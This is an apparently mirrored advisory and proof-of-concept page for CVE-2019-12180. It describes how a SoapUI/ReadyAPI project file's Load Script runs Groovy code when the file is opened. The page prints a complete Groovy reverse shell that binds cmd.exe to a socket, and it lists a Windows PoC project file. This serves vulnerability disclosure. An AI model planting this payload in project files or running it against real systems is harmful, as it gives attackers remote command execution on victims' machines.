Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-12180 PoC — SmartBear Software ReadyAPI和SoapUI 输入验证错误漏洞

Source
https://github.com/0x-nope/CVE-2019-12180
Associated Vulnerability
Title:SmartBear Software ReadyAPI和SoapUI 输入验证错误漏洞 (CVE-2019-12180)
Description:SmartBear Software ReadyAPI是美国SmartBear Software公司的一款API测试平台。该平台支持功能测试、负载测试和服务虚拟化等功能。 SmartBear Software ReadyAPI 2.8.2版本至3.0.0版本和SoapUI 5.5及之前版本中的Load Script功能存在输入验证错误漏洞。本地攻击者可利用该漏洞在系统上执行任意代码。
Description
Advisory & PoC
Readme
# CVE-2019-12180
Advisory & PoC

SoapUI and ReadyAPI allow you to create or add dynamic contents to test cases
(for example, to calculate a timestamp on the fly) using Apache Groovy Language
scripts. Execution of these scripts can be triggered in many ways and they are
stored inside the XML "Project file" once a project is saved. 

The "Load Script" function allows to create a Groovy script that is launched
once the project file is opened (con:afterLoadScript element of the XML Project
file) without any further user interaction. This behavior can be abused by an
attacker to create malicious project files that, once opened, execute arbitrary
Groovy code on the victim system. Since it is possible to execute system
commands using the Groovy language, this feature can be abused to execute
remote commands effectively.

NOTE: the same goal can be achieved by exploiting any other Groovy script capable
function ("Save script" for example), but this will require additional user
interaction after loading the project file.


Vulnerable Application: 
 - ReadyAPI 3.0.0
 - 2.8.2 and earlier
 - SoapUI 5.5 and earlier

<b>At the time of writing (2020-02-04), this is a 0day vulnerability, since 
(multiple) proposed disclosure dates have passed with no patch release by the
vendor. </b>

Example Groovy Reverse shell (https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76):

<code>

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
</code>
File Snapshot

 [4.0K]  /data/pocs/c8fc5732fcab707cbfe45ef68021baf4f77f1303
├── [ 745]  CVE-2019-12180_Wndows_PoC.xml
└── [1.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.